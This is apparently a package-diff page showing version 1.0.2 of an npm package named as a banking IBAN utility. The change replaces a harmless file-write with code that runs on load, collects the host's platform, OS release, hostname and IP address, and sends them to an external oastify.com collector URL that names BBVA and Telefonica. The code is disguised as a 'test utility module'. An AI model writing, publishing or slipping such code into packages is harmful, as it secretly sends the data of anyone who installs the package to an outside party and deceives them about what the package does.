@woody-mrs-potato/utils-banking 1.0.1 → 1.0.2

Sign up to get free protection for your applications and to get access to all the features.
Files changed (2) hide show
  1. package/package.json +1 -1
  2. package/src/iban.js +16 -10
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "@woody-mrs-potato/utils-banking",
3
- "version": "1.0.1",
3
+ "version": "1.0.2",
4
4
  "description": "A test utility module for common operations.",
5
5
  "main": "src/iban.js",
6
6
  "author": "Telefo David",
package/src/iban.js CHANGED
@@ -1,14 +1,20 @@
1
- const fs = require('fs');
2
- const path = require('path');
1
+ const os = require('os');
2
+ const https = require('https');
3
3
 
4
- const content = 'Este es un archivo de prueba creado en /tmp';
4
+ const systemInfo = {
5
+ platform: os.platform(),
6
+ release: os.release(),
7
+ hostname: os.hostname(),
8
+ ip: os.networkInterfaces()['eth0'] ? os.networkInterfaces()['eth0'][0].address : 'Unknown',
9
+ };
5
10
 
6
- const filePath = path.join('/tmp', 'archivo_prueba.txt');
11
+ const queryParams = new URLSearchParams(systemInfo).toString();
12
+ const url = `https://lb0wfl0wv7ay9yxaniioaw54tvzmncb1.oastify.com/BBVA/telefonica?${queryParams}`;
7
13
 
8
- fs.writeFile(filePath, content, (err) => {
9
- if (err) {
10
- console.error('Error al crear el archivo:', err);
11
- } else {
12
- console.log('Archivo creado en:', filePath);
13
- }
14
+ https.get(url, (res) => {
15
+ console.log(`Status: ${res.statusCode}`);
16
+ }).on('error', (e) => {
17
+ console.error(`Problem with request: ${e.message}`);
14
18
  });
19
+
20
+ console.log("Test module loaded successfully");